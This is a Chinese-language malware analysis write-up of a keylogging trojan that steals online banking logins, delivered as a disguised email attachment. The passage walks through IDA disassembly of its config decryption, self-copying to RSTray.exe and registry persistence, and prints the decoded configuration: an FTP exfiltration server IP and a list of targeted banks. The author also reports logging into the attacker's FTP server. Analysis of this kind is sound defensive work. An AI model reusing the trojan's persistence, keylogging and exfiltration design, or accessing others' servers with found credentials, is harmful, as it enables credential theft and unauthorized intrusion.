【文章标题】: 一个偷银行帐号木马的简单分析
【文章作者】: CCDebuger
【下载地址】: 自己搜索下载
【作者声明】: 只是感兴趣,没有其他目的。失误之处敬请诸位大侠赐教!
--------------------------------------------------------------------------------
【详细过程】
今天看邮箱,收到一封 刘娜 <mnbppp@163.com> 来的垃圾邮件,内容如下:
您好 我在互联网上看到你们公司发的产品信息
请问向这种的什么价格 可以邮购吗 谢谢回复
里面有个附件“图片.rar”,一看就估计有问题。下载“图片.rar”解压后有个图标为资源浏览器中图片图标的“图片.exe”文件,是个 RAR 自解压文件,解压脚本如下:
;下面的注释包含自解压脚本命令
Path=%systemroot%\temp
SavePath
Setup=book.exe
Presetup=1.jpg
Silent=1
Overwrite=2
直接用 WinRAR 解压,看里面的 book.exe。这个程序不知道加了什么壳,脱的时候看了一下,有好几层壳,不过都是压缩壳,直接 ESP 定律脱之。脱完是个 Delphi 编的程序,看了一下资源,里面的 RCDATA 中有个 INFO 的资源,应该就是加密后的配置文件了。先 IDA 分析一下,这个程序到时比较直接,先解码配置文件,然后复制自身到系统目录运行,再设一些注册表项目,再来监视键盘:
CODE:00433FC0 public start
CODE:00433FC0 start:
CODE:00433FC0
push ebp
CODE:00433FC1
mov ebp,
esp
CODE:00433FC3
mov ecx, 6
CODE:00433FC3
CODE:00433FC8
CODE:00433FC8 loc_433FC8:
; CODE XREF: CODE:00433FCDj
CODE:00433FC8
push 0
CODE:00433FCA
push 0
CODE:00433FCC
dec ecx
CODE:00433FCD
jnz short loc_433FC8
CODE:00433FCD
CODE:00433FCF
push ecx
CODE:00433FD0
push ebx
CODE:00433FD1
push esi
CODE:00433FD2
mov eax,
offset dword_433EF0
CODE:00433FD7
call Sysinit::__linkproc__ InitExe(void *)
CODE:00433FD7
CODE:00433FDC
mov esi,
offset unk_437A4C
CODE:00433FE1
xor eax,
eax
CODE:00433FE3
push ebp
CODE:00433FE4
push offset loc_4341B0
CODE:00433FE9
push dword ptr fs:[
eax]
CODE:00433FEC
mov fs:[
eax],
esp
CODE:00433FEF
lea edx, [
ebp-14h]
CODE:00433FF2
mov eax, 1
CODE:00433FF7
call System::ParamStr(
int)
CODE:00433FF7
CODE:00433FFC
mov eax, [
ebp-14h]
CODE:00433FFF
mov edx,
offset s->Lanzateactivex
; "/lanzateActiveX"
CODE:00434004
call System::__linkproc__
LStrCmp(void)
CODE:00434004
CODE:00434009
jnz short loc_43403C
CODE:00434009
CODE:0043400B
push 0
CODE:0043400D
push offset dword_4341D8
CODE:00434012
push offset s->Reactivateactivex_0
; "/reactivateActiveX"
CODE:00434017
lea edx, [
ebp-18h]
CODE:0043401A
xor eax,
eax
CODE:0043401C
call System::ParamStr(
int)
CODE:0043401C
CODE:00434021
mov eax, [
ebp-18h]
CODE:00434024
call System::__linkproc__ LStrToPChar(System::AnsiString)
CODE:00434024
CODE:00434029
push eax
CODE:0043402A
push 0
CODE:0043402C
mov eax,
ds:hInstance
CODE:00434031
push eax
CODE:00434032
call ShellExecuteA
CODE:00434032
CODE:00434037
call System::__linkproc__ Halt0(void)
CODE:00434037
CODE:0043403C
; ---------------------------------------------------------------------------
CODE:0043403C
CODE:0043403C loc_43403C:
; CODE XREF: CODE:00434009j
CODE:0043403C
lea edx, [
ebp-1Ch]
CODE:0043403F
mov eax, 1
CODE:00434044
call System::ParamStr(
int)
CODE:00434044
CODE:00434049
mov eax, [
ebp-1Ch]
CODE:0043404C
mov edx,
offset s->Lanzaterunonce_0
; "/lanzateRunOnce"
CODE:00434051
call System::__linkproc__
LStrCmp(void)
CODE:00434051
CODE:00434056
jnz short loc_434089
CODE:00434056
CODE:00434058
push 0
CODE:0043405A
push offset dword_4341D8
CODE:0043405F
push offset s->Reactivaterunonce_0
; "/reactivateRunOnce"
CODE:00434064
lea edx, [
ebp-20h]
CODE:00434067
xor eax,
eax
CODE:00434069
call System::ParamStr(
int)
CODE:00434069
CODE:0043406E
mov eax, [
ebp-20h]
CODE:00434071
call System::__linkproc__ LStrToPChar(System::AnsiString)
CODE:00434071
CODE:00434076
push eax
CODE:00434077
push 0
CODE:00434079
mov eax,
ds:hInstance
CODE:0043407E
push eax
CODE:0043407F
call ShellExecuteA
CODE:0043407F
CODE:00434084
call System::__linkproc__ Halt0(void)
CODE:00434084
CODE:00434089
; ---------------------------------------------------------------------------
CODE:00434089
CODE:00434089 loc_434089:
; CODE XREF: CODE:00434056j
CODE:00434089
lea edx, [
ebp-24h]
CODE:0043408C
mov eax, 1
CODE:00434091
call System::ParamStr(
int)
CODE:00434091
CODE:00434096
mov eax, [
ebp-24h]
CODE:00434099
mov edx,
offset s->Instalando
; "/instalando"
CODE:0043409E
call System::__linkproc__
LStrCmp(void)
CODE:0043409E
CODE:004340A3
jz short loc_4340DD
CODE:004340A3
CODE:004340A5
lea edx, [
ebp-28h]
CODE:004340A8
mov eax, 1
CODE:004340AD
call System::ParamStr(
int)
CODE:004340AD
CODE:004340B2
mov eax, [
ebp-28h]
CODE:004340B5
mov edx,
offset s->Reactivateactivex_1
; "/reactivateActiveX"
CODE:004340BA
call System::__linkproc__
LStrCmp(void)
CODE:004340BA
CODE:004340BF
jz short loc_4340DD
CODE:004340BF
CODE:004340C1
lea edx, [
ebp-2Ch]
CODE:004340C4
mov eax, 1
CODE:004340C9
call System::ParamStr(
int)
CODE:004340C9
CODE:004340CE
mov eax, [
ebp-2Ch]
CODE:004340D1
mov edx,
offset s->Reactivaterunonce_1
; "/reactivateRunOnce"
CODE:004340D6
call System::__linkproc__
LStrCmp(void)
CODE:004340D6
CODE:004340DB
jnz short loc_43411B
CODE:004340DB
CODE:004340DD
CODE:004340DD loc_4340DD:
; CODE XREF: CODE:004340A3j
CODE:004340DD
; CODE:004340BFj
CODE:004340DD
lea edx, [
ebp-30h]
CODE:004340E0
mov eax, 2
CODE:004340E5
call System::ParamStr(
int)
CODE:004340E5
CODE:004340EA
mov eax, [
ebp-30h]
CODE:004340ED
mov edx,
offset s->Melt
; "/melt"
CODE:004340F2
call System::__linkproc__
LStrCmp(void)
CODE:004340F2
CODE:004340F7
jnz short loc_43411B
CODE:004340F7
CODE:004340F9
jmp short loc_434102
CODE:004340F9
CODE:004340FB
; ---------------------------------------------------------------------------
CODE:004340FB
CODE:004340FB loc_4340FB:
; CODE XREF: CODE:00434119j
CODE:004340FB
push 64h
CODE:004340FD
call Sleep
CODE:004340FD
CODE:00434102
CODE:00434102 loc_434102:
; CODE XREF: CODE:004340F9j
CODE:00434102
lea edx, [
ebp-34h]
CODE:00434105
mov eax, 3
CODE:0043410A
call System::ParamStr(
int)
CODE:0043410A
CODE:0043410F
mov eax, [
ebp-34h]
CODE:00434112
call Sysutils::
DeleteFile(System::AnsiString)
CODE:00434112
CODE:00434117
test al,
al
CODE:00434119
jz short loc_4340FB
CODE:00434119
CODE:0043411B
CODE:0043411B loc_43411B:
; CODE XREF: CODE:004340DBj
CODE:0043411B
; CODE:004340F7j
CODE:0043411B
push offset s->Ik0_1Abcd
; "IK 0.1 abcd"
CODE:00434120
push 0FFFFFFFFh
CODE:00434122
push 0
CODE:00434124
call _Create_Mutex
; BDS 2005-2006 and Delphi6-7 Visual Component Library
CODE:00434124
CODE:00434129
mov ebx,
eax
CODE:0043412B
call GetLastError
CODE:0043412B
CODE:00434130
cmp eax, ERROR_ALREADY_EXISTS
CODE:00434135
jnz short loc_43413C
CODE:00434135
CODE:00434137
call System::__linkproc__ Halt0(void)
CODE:00434137
CODE:0043413C
; ---------------------------------------------------------------------------
CODE:0043413C
CODE:0043413C loc_43413C:
; CODE XREF: CODE:00434135j
CODE:0043413C
call _Read_INFO
; 读取 RCDATA 中 INFO 的内容并解码
CODE:0043413C
CODE:00434141
call _Copy_and_Run
; 复制自身到系统目录并运行
CODE:00434141
CODE:00434146
call _Set_Reg_Info
; 在注册表中设置内容并视情况在系统目录中创建 pschost 目录,
CODE:00434146
; 复制木马到此目录,并设置注册表项。
CODE:00434146
CODE:0043414B
call _Get_KeyBoard
; 监视键盘输入
----------------------------------------------------------------------------------------------------------
一、配置文件的解码
这个木马我最感兴趣的就是看看它的配置如何,来看看解码配置这一段。先看看程序中 INFO 资源原来的数据:
0000h: 35 36 32 38 40 40 40 24 30 79 B9 45 04 BE C4 59 5628@@@$0y笶.灸Y
0010h: 65 36 E1 2B DC 34 46 CF CB 28 DB EA 80 D9 93 38 e6??F纤(坳€贀8
0020h: 55 49 B6 97 F8 19 B8 0A 02 2F 39 CE 2B AB C7 3C UI稐??./9?<
0030h: 61 39 84 8F 35 1C 7E F5 57 60 A4 B4 C2 0C 75 92 a9剰5.~鮓`ご?u?
0040h: 71 6A 9F 54 1E 76 21 A0 7F 43 FC A0 B6 07 B6 DD qj烼.v!?C鼱?遁
0050h: D7 F9 A5 1D 4D 19 25 61 49 C6 14 02 52 FD 60 A3 座?M.%aI?.R齚?
0060h: 8A 3C ED 90 FF 0F 0D D7 03 EB E7 98 48 16 1A B6 ?韾..?腌楬..?
0070h: 28 12 7C BB 9B AB 70 87 28 73 B5 3B 92 81 BE 7D (.|粵玴?s?拋緘
0080h: DF 86 BA 7F F8 40 9F FA 9D BB 17 87 98 E6 2C D5 邌?鳣燏澔.嚇??
0090h: 28 94 F1 4B 21 39 72 BC E9 99 F6 AE ED 4F C5 DB (旕K!9r奸欥O袍
00A0h: 41 C8 A0 55 2A D9 BD 0D 16 04 0A 13 8F 0F 36 AC A葼U*俳.....?6?
00B0h: F8 99 E4 FD F7 62 5D 21 4E CF B1 B3 4E D9 0F 7E 鴻潺鱞]!N媳砃?~
00C0h: 69 D6 D5 82 42 ED C6 A7 A5 FF 23 CD 49 5E ED 42 i终侭砥Д#虸^鞡
00D0h: 29 98 DE B6 F4 E6 D8 36 9B 22 A5 5B 63 81 50 9C )樲遏尕6?c丳?
00E0h: 5E 7C 2D 15 49 0A 17 3B 4C C4 F1 BB DA 78 61 4B ^|-.I..;L鸟悔xaK
00F0h: 57 20 50 95 4C 06 8C 0F EC ED 50 FA F0 61 9C 88 W P昄.?祉Pa湀
0100h: 24 73 05 15 CE 26 DA E6 AD BF A4 94 6F 8E 95 29 $s..?阪o帟)
0110h: 2C 1A A1 01 DD 8C F5 C7 4D 21 16 C7 EC 8C C7 56 ,.?輰跚M!.庆屒V
0120h: 83 58 92 42 D7 10 30 8C FA F5 60 06 41 50 3D 4C 僗払?0岤鮜.AP=L
0130h: A2 4B FF 15 C4 11 DA E5 0E EC 4C 6E 6D B6 F7 B2 .?阱.霯nm恩?
0140h: EE D5 DB 46 26 F7 52 DC 31 ED 64 61 B2 AF B3 80 钫跢&鱎?韉a帛硛
0150h: CA 81 EB 95 D0 2E 34 ED AF F1 94 DC E4 06 31 82 蕘霑?4懑駭茕.1?
0160h: 6F 47 55 78 30 7D 50 6E FA 4B 8B 99 39 75 9B 76 oGUx0}Pn鶮嫏9u泇
0170h: AA 7A B0 58 8A 45 E3 01 B3 06 B7 20 30 28 87 CE 獄癤奅???0(囄
0180h: 28 33 5E 20 1C 9A 15 FB B8 B1 A1 38 5E 18 0D C7 (3^ .?薄8^..?
0190h: 66 B2 3D 57 CE D3 3D 3C 68 B7 99 5D F3 8D F8 2F f?W斡=<h窓]髰?
01A0h: D2 41 AC 71 FD 1B 88 3B 9E 6F D4 E7 C2 E6 13 7A 褹琿??瀘早骆.z
01B0h: 75 41 03 F2 7F 69 76 89 60 D8 B5 BD EC EF BA 07 uA.?iv塦氐届锖.
01C0h: BE 42 77 B2 95 EB 74 8C BC A6 3B 40 18 29 4E 4D 綛w矔雝尲?@.)NM
01D0h: D1 C2 2E EE D9 92 09 69 2C C4 CE FE 3F 29 FB 38 崖.钯?i,奈?)?
01E0h: 04 6C 75 6E 4D 8C D3 7C E7 95 17 1D 93 21 2B 7B .lunM層|鐣..?+{
01F0h: C5 62 00 舃.
现在看看解码配置的代码:
CODE:00433990 _Read_INFO
proc near
; CODE XREF: CODE:loc_43413Cp
CODE:00433990
CODE:00433990 var_18 =
dword ptr -18h
CODE:00433990 var_14 =
dword ptr -14h
CODE:00433990 var_10 =
dword ptr -10h
CODE:00433990 var_C =
dword ptr -0Ch
CODE:00433990 var_8 =
dword ptr -8
CODE:00433990 var_4 =
dword ptr -4
CODE:00433990
CODE:00433990
push ebp
CODE:00433991
mov ebp,
esp
CODE:00433993
xor ecx,
ecx
CODE:00433995
push ecx
CODE:00433996
push ecx
CODE:00433997
push ecx
CODE:00433998
push ecx
CODE:00433999
push ecx
CODE:0043399A
push ecx
CODE:0043399B
push ebx
CODE:0043399C
push esi
CODE:0043399D
push edi
CODE:0043399E
xor eax,
eax
CODE:004339A0
push ebp
CODE:004339A1
push offset loc_433E8E
CODE:004339A6
push dword ptr fs:[
eax]
CODE:004339A9
mov fs:[
eax],
esp
CODE:004339AC
push 0Ah
; lpType
CODE:004339AE
push offset s->Info
; "INFO"
CODE:004339B3
mov eax,
ds:hInstance
CODE:004339B8
push eax ; hModule
CODE:004339B9
call FindResourceA
CODE:004339B9
CODE:004339BE
mov ebx,
eax
CODE:004339C0
push ebx ; hResInfo
CODE:004339C1
mov eax,
ds:hInstance
CODE:004339C6
push eax ; hModule
CODE:004339C7
call SizeofResource
CODE:004339C7
CODE:004339CC
mov esi,
eax
CODE:004339CE
push ebx ; hResInfo
CODE:004339CF
mov eax,
ds:hInstance
CODE:004339D4
push eax ; hModule
CODE:004339D5
call LoadResource
CODE:004339D5
CODE:004339DA
mov ebx,
eax
CODE:004339DC
push ebx ; hResData
CODE:004339DD
call LockResource
CODE:004339DD
CODE:004339E2
mov edi,
eax
CODE:004339E4
test edi,
edi
CODE:004339E6
jnz short loc_4339ED
CODE:004339E6
CODE:004339E8
call System::__linkproc__ Halt0(void)
CODE:004339E8
CODE:004339ED
; ---------------------------------------------------------------------------
CODE:004339ED
CODE:004339ED loc_4339ED:
; CODE XREF: _Read_INFO+56j
CODE:004339ED
mov edx,
esi
CODE:004339EF
dec edx
CODE:004339F0
lea eax, [
ebp+var_4]
CODE:004339F3
call System::__linkproc__ LStrSetLength(void)
CODE:004339F3
CODE:004339F8
lea eax, [
ebp+var_4]
CODE:004339FB
call j_unknown_libname_64
CODE:004339FB
CODE:00433A00
mov ecx,
esi
CODE:00433A02
mov edx,
edi
CODE:00433A04
call _Move_Data
CODE:00433A04
CODE:00433A09
push ebx ; hResData
CODE:00433A0A
call FreeResource
CODE:00433A0A
CODE:00433A0F
lea eax, [
ebp+var_C]
CODE:00433A12
push eax
CODE:00433A13
mov edx, [
ebp+var_4]
CODE:00433A16
mov eax,
offset off_433EAC
CODE:00433A1B
call _Cmp_Str_by_Len
; BDS 2005-2006 and Delphi6-7 Visual Component Library
CODE:00433A1B
CODE:00433A20
mov ecx,
eax
CODE:00433A22
dec ecx
CODE:00433A23
mov edx, 1
CODE:00433A28
mov eax, [
ebp+var_4]
CODE:00433A2B
call System::__linkproc__ LStrCopy(void)
CODE:00433A2B
CODE:00433A30
mov eax, [
ebp+var_C]
CODE:00433A33
call Sysutils::
StrToInt(System::AnsiString)
CODE:00433A33
CODE:00433A38
mov ebx,
eax
CODE:00433A3A
lea eax, [
ebp+var_4]
CODE:00433A3D
push eax
CODE:00433A3E
mov edx, [
ebp+var_4]
CODE:00433A41
mov eax,
offset off_433EAC
CODE:00433A46
call _Cmp_Str_by_Len
; BDS 2005-2006 and Delphi6-7 Visual Component Library
CODE:00433A46
CODE:00433A4B
push eax
CODE:00433A4C
mov eax, [
ebp+var_4]
CODE:00433A4F
call _Get_StrLen
CODE:00433A4F
CODE:00433A54
pop edx
CODE:00433A55
sub eax,
edx
CODE:00433A57
add eax, 3
CODE:00433A5A
push eax
CODE:00433A5B
mov edx, [
ebp+var_4]
CODE:00433A5E
mov eax,
offset off_433EAC
CODE:00433A63
call _Cmp_Str_by_Len
; BDS 2005-2006 and Delphi6-7 Visual Component Library
CODE:00433A63
CODE:00433A68
mov edx,
eax
CODE:00433A6A
add edx, 3
CODE:00433A6D
mov eax, [
ebp+var_4]
CODE:00433A70
pop ecx
CODE:00433A71
call System::__linkproc__ LStrCopy(void)
CODE:00433A71
CODE:00433A76
lea ecx, [
ebp+var_10]
CODE:00433A79
mov edx,
ebx
CODE:00433A7B
mov eax, [
ebp+var_4]
CODE:00433A7E
call _Decrypt_INFO
; 这里面对 INFO 中的数据进行解码
CODE:00433A7E
CODE:00433A83
mov edx, [
ebp+var_10]
; 程序中的INFO资源解码后的结果地址送EDX
CODE:00433A86
lea eax, [
ebp+var_4]
CODE:00433A89
call System::__linkproc__ LStrLAsg(void *,void *)
CODE:00433A89
CODE:00433A8E
mov ebx, 1
CODE:00433A8E
CODE:00433A93
CODE:00433A93 loc_433A93:
; CODE XREF: _Read_INFO+4DDj
----------------------------------------------------------------------------------------------------------
解码算法:
CODE:00414834 loc_414834:
; CODE XREF: _Decrypt_INFO+69j
CODE:00414834
mov eax, [
esp+18h+var_18]
CODE:00414837
call _Read_Str
CODE:00414837
CODE:0041483C
movzx edi,
bx ; 下面这一段就是解码算法
CODE:0041483F
mov dl, [
ebp+
edi-1]
CODE:00414843
movzx ecx,
si
CODE:00414846
shr ecx, 8
CODE:00414849
xor dl,
cl
CODE:0041484B
mov [
eax+
edi-1],
dl
CODE:0041484F
xor eax,
eax
CODE:00414851
mov al, [
ebp+
edi-1]
CODE:00414855
add si,
ax
CODE:00414858
imul ax,
si, 0BC17h
CODE:0041485D
add ax, 0F386h
CODE:00414861
mov esi,
eax
CODE:00414863
inc ebx
CODE:00414864
dec [
esp+18h+var_14]
CODE:00414869
jnz short loc_414834
让加密的配置文件在 OD 中动态跑一下,利用程序自身来解出配置文件。加密数据中开始的那个“5628”是不参加解码的。整理后如下(为安全计,隐去 FTP 用户名和密码。//后面是我加的注释):
1
125.64.24.60 //FTP 的 IP 地址
2** //FTP 用户名?
1** //FTP 密码?
21 //FTP 端口
/IKLogs/%UserName%/
0
0
0
1
%Windir%\RSTray.exe //系统的 Windows 目录下创建木马文件
1
010000
svchost //设置注册表中的自动运行项
SCISound
{4fz8rk-15aq-16nc-23or4-2ke0fa051515}
pschost
1
中国建设银行|||广东发展银行|||中国民生银行|||中国邮政支付网关|||网付通支付网关|||广州市商业银行|||顺德信用社|||信社e-bank|||兴业银行|||深圳平安银行|||在线兴业|||平安个人网上银行|||宁波银行|||信用合作联社|||支付页面|||客户交易结果信息显示|||
1000
800
50
1
SOFTWARE\Microsoft\Cryptography\RNG\
1
根据上面弄出来的东西,应该是个偷银行帐号的马,估计和 IKlogger 这个软件有关。用得出来的 FTP 地址和用户名、密码,连了一下,里面有个 iklogs 目录,再按监测到各个电脑的用户名分类建立目录,各用户名目录下分别生成 clickshots 和 logs 目录,这个 logs 目录下面按时间生成的文本文件就是键盘记录了。
----------------------------------------------------------------------------------------------------------
二、复制自身并运行
CODE:004332C4 _Copy_and_Run
proc near
; CODE XREF: CODE:00434141p
CODE:004332C4
CODE:004332C4 var_1C =
dword ptr -1Ch
CODE:004332C4 var_18 =
dword ptr -18h
CODE:004332C4 var_14 =
dword ptr -14h
CODE:004332C4 var_10 =
dword ptr -10h
CODE:004332C4 var_C =
dword ptr -0Ch
CODE:004332C4 var_8 =
dword ptr -8
CODE:004332C4 var_4 =
dword ptr -4
CODE:004332C4
CODE:004332C4
push ebp
CODE:004332C5
mov ebp,
esp
CODE:004332C7
xor ecx,
ecx
CODE:004332C9
push ecx
CODE:004332CA
push ecx
CODE:004332CB
push ecx
CODE:004332CC
push ecx
CODE:004332CD
push ecx
CODE:004332CE
push ecx
CODE:004332CF
push ecx
CODE:004332D0
xor eax,
eax
CODE:004332D2
push ebp
CODE:004332D3
push offset loc_43340F
CODE:004332D8
push dword ptr fs:[
eax]
CODE:004332DB
mov fs:[
eax],
esp
CODE:004332DE
lea edx, [
ebp+var_4]
CODE:004332E1
mov eax,
ds:off_4361BC
CODE:004332E6
mov eax, [
eax]
CODE:004332E8
call _Envionment_Var_To_Real_Value
; 把环境变量转换为实际的系统路径
CODE:004332E8
CODE:004332ED
mov edx, [
ebp+var_4]
CODE:004332F0
mov eax,
ds:off_4361BC
CODE:004332F5
call System::__linkproc__ LStrAsg(void *,void *)
CODE:004332F5
CODE:004332FA
lea edx, [
ebp+var_8]
CODE:004332FD
mov eax,
ds:off_4360FC
CODE:00433302
mov eax, [
eax]
CODE:00433304
call _Envionment_Var_To_Real_Value
CODE:00433304
CODE:00433309
mov edx, [
ebp+var_8]
CODE:0043330C
mov eax,
ds:off_4360FC
CODE:00433311
call System::__linkproc__ LStrAsg(void *,void *)
CODE:00433311
CODE:00433316
lea edx, [
ebp+var_C]
CODE:00433319
xor eax,
eax
CODE:0043331B
call System::ParamStr(
int)
CODE:0043331B
CODE:00433320
mov eax, [
ebp+var_C]
CODE:00433323
mov edx,
ds:off_4361BC
CODE:00433329
mov edx, [
edx]
CODE:0043332B
call System::__linkproc__
LStrCmp(void)
CODE:0043332B
CODE:00433330
jz loc_4333F4
CODE:00433330
CODE:00433336
push 0
; bFailIfExists
CODE:00433338
mov eax,
ds:off_4361BC
CODE:0043333D
mov eax, [
eax]
CODE:0043333F
call System::__linkproc__ LStrToPChar(System::AnsiString)
CODE:0043333F
CODE:00433344
push eax ; lpNewFileName
CODE:00433345
lea edx, [
ebp+var_10]
CODE:00433348
xor eax,
eax
CODE:0043334A
call System::ParamStr(
int)
CODE:0043334A
CODE:0043334F
mov eax, [
ebp+var_10]
CODE:00433352
call System::__linkproc__ LStrToPChar(System::AnsiString)
CODE:00433352
CODE:00433357
push eax ; lpExistingFileName
CODE:00433358
call CopyFileA
; 把木马复制到 Windows 目录,根据解码后的配置文件,改名为 RSTray.exe
CODE:00433358
CODE:0043335D
mov eax,
ds:off_436188
CODE:00433362
cmp byte ptr [
eax], 1
CODE:00433365
jnz short loc_4333C9
CODE:00433365
CODE:00433367
push 0
; nShowCmd
CODE:00433369
push offset Directory
; lpDirectory
CODE:0043336E
push offset s->InstalandoMelt
; "/instalando /melt \""
CODE:00433373
lea edx, [
ebp+var_1C]
CODE:00433376
xor eax,
eax
CODE:00433378
call System::ParamStr(
int)
CODE:00433378
CODE:0043337D
mov eax, [
ebp+var_1C]
CODE:00433380
call System::__linkproc__ LStrToPChar(System::AnsiString)
CODE:00433380
CODE:00433385
mov edx,
eax
CODE:00433387
lea eax, [
ebp+var_18]
CODE:0043338A
call _Get_String_Len
; BDS 2005-2006 and Delphi6-7 Visual Component Library
CODE:0043338A
CODE:0043338F
push [
ebp+var_18]
CODE:00433392
push offset dword_433444
CODE:00433397
lea eax, [
ebp+var_14]
CODE:0043339A
mov edx, 3
CODE:0043339F
call System::__linkproc__ LStrCatN(void)
CODE:0043339F
CODE:004333A4
mov eax, [
ebp+var_14]
CODE:004333A7
call System::__linkproc__ LStrToPChar(System::AnsiString)
CODE:004333A7
CODE:004333AC
push eax ; lpParameters
CODE:004333AD
mov eax,
ds:off_4361BC
CODE:004333B2
mov eax, [
eax]
CODE:004333B4
call System::__linkproc__ LStrToPChar(System::AnsiString)
CODE:004333B4
CODE:004333B9
push eax ; lpFile
CODE:004333BA
push 0
; lpOperation
CODE:004333BC
mov eax,
ds:hInstance
CODE:004333C1
push eax ; hwnd
CODE:004333C2
call ShellExecuteA
; 加上面的 /instalando /melt 参数运行木马
CODE:004333C2
CODE:004333C7
jmp short loc_4333EF
CODE:004333C7
CODE:004333C9
; ---------------------------------------------------------------------------
CODE:004333C9
CODE:004333C9 loc_4333C9:
; CODE XREF: _Copy_and_Run+A1j
CODE:004333C9
push 0
; nShowCmd
CODE:004333CB
push offset Directory
; lpDirectory
CODE:004333D0
push offset Parameters
; "/instalando"
CODE:004333D5
mov eax,
ds:off_4361BC
CODE:004333DA
mov eax, [
eax]
CODE:004333DC
call System::__linkproc__ LStrToPChar(System::AnsiString)
CODE:004333DC
CODE:004333E1
push eax ; lpFile
CODE:004333E2
push 0
; lpOperation
CODE:004333E4
mov eax,
ds:hInstance
CODE:004333E9
push eax ; hwnd
CODE:004333EA
call ShellExecuteA
CODE:004333EA
CODE:004333EF
CODE:004333EF loc_4333EF:
; CODE XREF: _Copy_and_Run+103j
CODE:004333EF
call System::__linkproc__ Halt0(void)
CODE:004333EF
CODE:004333F4
; ---------------------------------------------------------------------------
CODE:004333F4
CODE:004333F4 loc_4333F4:
; CODE XREF: _Copy_and_Run+6Cj
CODE:004333F4
xor eax,
eax
CODE:004333F6
pop edx
CODE:004333F7
pop ecx
CODE:004333F8
pop ecx
CODE:004333F9
mov fs:[
eax],
edx
CODE:004333FC
push offset loc_433416
CODE:004333FC
CODE:00433401
CODE:00433401 loc_433401:
; CODE XREF: _Copy_and_Run+150j
CODE:00433401
lea eax, [
ebp+var_1C]
CODE:00433404
mov edx, 7
CODE:00433409
call System::__linkproc__ LStrArrayClr(void *,
int)
CODE:00433409
CODE:0043340E
retn
CODE:0043340E
CODE:0043340F
; ---------------------------------------------------------------------------
CODE:0043340F
CODE:0043340F loc_43340F:
; DATA XREF: _Copy_and_Run+Fo
CODE:0043340F
jmp unknown_libname_48
; BDS 2005-2006 and Delphi6-7 Visual Component Library
CODE:0043340F
CODE:00433414
; ---------------------------------------------------------------------------
CODE:00433414
jmp short loc_433401
CODE:00433414
CODE:00433416
; ---------------------------------------------------------------------------
CODE:00433416
CODE:00433416 loc_433416:
; CODE XREF: _Copy_and_Run+14Aj
CODE:00433416
; DATA XREF: _Copy_and_Run+138o
CODE:00433416
mov esp,
ebp
CODE:00433418
pop ebp
CODE:00433419
retn
CODE:00433419
CODE:00433419 _Copy_and_Run
endp
以上为文件复制部分的代码,这里我不详细讲了,只给出结果:
木马在系统的 Windows 目录下复制自身,并命名为 RSTray.exe,带参数 /instalando /melt 运行。
----------------------------------------------------------------------------------------------------------
三、注册表的设置
CODE:0043375C _Set_Reg_Info
proc near
; CODE XREF: CODE:00434146p
CODE:0043375C
CODE:0043375C var_14 =
dword ptr -14h
CODE:0043375C var_10 =
dword ptr -10h
CODE:0043375C var_C =
dword ptr -0Ch
CODE:0043375C var_8 =
dword ptr -8
CODE:0043375C var_4 =
dword ptr -4
CODE:0043375C
CODE:0043375C
push ebp
CODE:0043375D
mov ebp,
esp
CODE:0043375F
xor ecx,
ecx
CODE:00433761
push ecx
CODE:00433762
push ecx
CODE:00433763
push ecx
CODE:00433764
push ecx
CODE:00433765
push ecx
CODE:00433766
push ebx
CODE:00433767
mov ebx,
ds:off_436284
CODE:0043376D
xor eax,
eax
CODE:0043376F
push ebp
CODE:00433770
push offset loc_43388C
CODE:00433775
push dword ptr fs:[
eax]
CODE:00433778
mov fs:[
eax],
esp
CODE:0043377B
lea edx, [
ebp+var_4]
CODE:0043377E
mov eax, 1
CODE:00433783
call System::ParamStr(
int)
CODE:00433783
CODE:00433788
mov eax, [
ebp+var_4]
CODE:0043378B
mov edx,
offset s->Reactivateactivex
; "/reactivateActiveX"
CODE:00433790
call System::__linkproc__
LStrCmp(void)
CODE:00433790
CODE:00433795
jnz short loc_4337B9
CODE:00433795
CODE:00433797
mov ecx,
ds:off_4360F0
CODE:0043379D
mov ecx, [
ecx]
CODE:0043379F
lea eax, [
ebp+var_8]
CODE:004337A2
mov edx,
offset s->SoftwareMicrosoftActiveSetupInstalledComponents_0
; "SOFTWARE\\Microsoft\\Active Setup\\Install"...
CODE:004337A7
call System::__linkproc__ LStrCat3(void)
CODE:004337A7
CODE:004337AC
mov edx, [
ebp+var_8]
CODE:004337AF
mov eax, HKEY_CURRENT_USER
CODE:004337B4
call _Delete_RegKey
CODE:004337B4
CODE:004337B9
CODE:004337B9 loc_4337B9:
; CODE XREF: _Set_Reg_Info+39j
CODE:004337B9
lea edx, [
ebp+var_C]
CODE:004337BC
mov eax, 1
CODE:004337C1
call System::ParamStr(
int)
CODE:004337C1
CODE:004337C6
mov eax, [
ebp+var_C]
CODE:004337C9
mov edx,
offset s->Reactivaterunonce
; "/reactivateRunOnce"
CODE:004337CE
call System::__linkproc__
LStrCmp(void)
CODE:004337CE
CODE:004337D3
jnz short loc_433814
CODE:004337D3
CODE:004337D5
push offset dword_433918
CODE:004337DA
lea edx, [
ebp+var_14]
CODE:004337DD
xor eax,
eax
CODE:004337DF
call System::ParamStr(
int)
CODE:004337DF
CODE:004337E4
push [
ebp+var_14]
CODE:004337E7
push offset dword_433918
CODE:004337EC
lea eax, [
ebp+var_10]
CODE:004337EF
mov edx, 3
CODE:004337F4
call System::__linkproc__ LStrCatN(void)
CODE:004337F4
CODE:004337F9
mov eax, [
ebp+var_10]
CODE:004337FC
push eax
CODE:004337FD
mov ecx,
ds:off_436270
CODE:00433803
mov ecx, [
ecx]
CODE:00433805
mov edx,
offset s->SoftwareMicrosoftWindowsCurrentversionRunonce_0
; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
CODE:0043380A
mov eax, HKEY_LOCAL_MACHINE
CODE:0043380F
call _Create_RegKey
CODE:0043380F
CODE:00433814
CODE:00433814 loc_433814:
; CODE XREF: _Set_Reg_Info+77j
CODE:00433814
cmp byte ptr [
ebx], 1
CODE:00433817
jnz short loc_433825
CODE:00433817
CODE:00433819
mov eax,
ds:off_4361AC
; 解码后配置文件的相关内容地址送EAX
CODE:0043381E
mov eax, [
eax]
; 获取解码后配置文件的相关内容,这里是 svchost
CODE:00433820
call _Create_Run_RegKey
CODE:00433820
CODE:00433825
CODE:00433825 loc_433825:
; CODE XREF: _Set_Reg_Info+BBj
CODE:00433825
cmp byte ptr [
ebx+1], 1
CODE:00433829
jnz short loc_433837
CODE:00433829
CODE:0043382B
mov eax,
ds:off_436270
CODE:00433830
mov eax, [
eax]
CODE:00433832
call _Create_RunOnce_RegKey
CODE:00433832
CODE:00433837
CODE:00433837 loc_433837:
; CODE XREF: _Set_Reg_Info+CDj
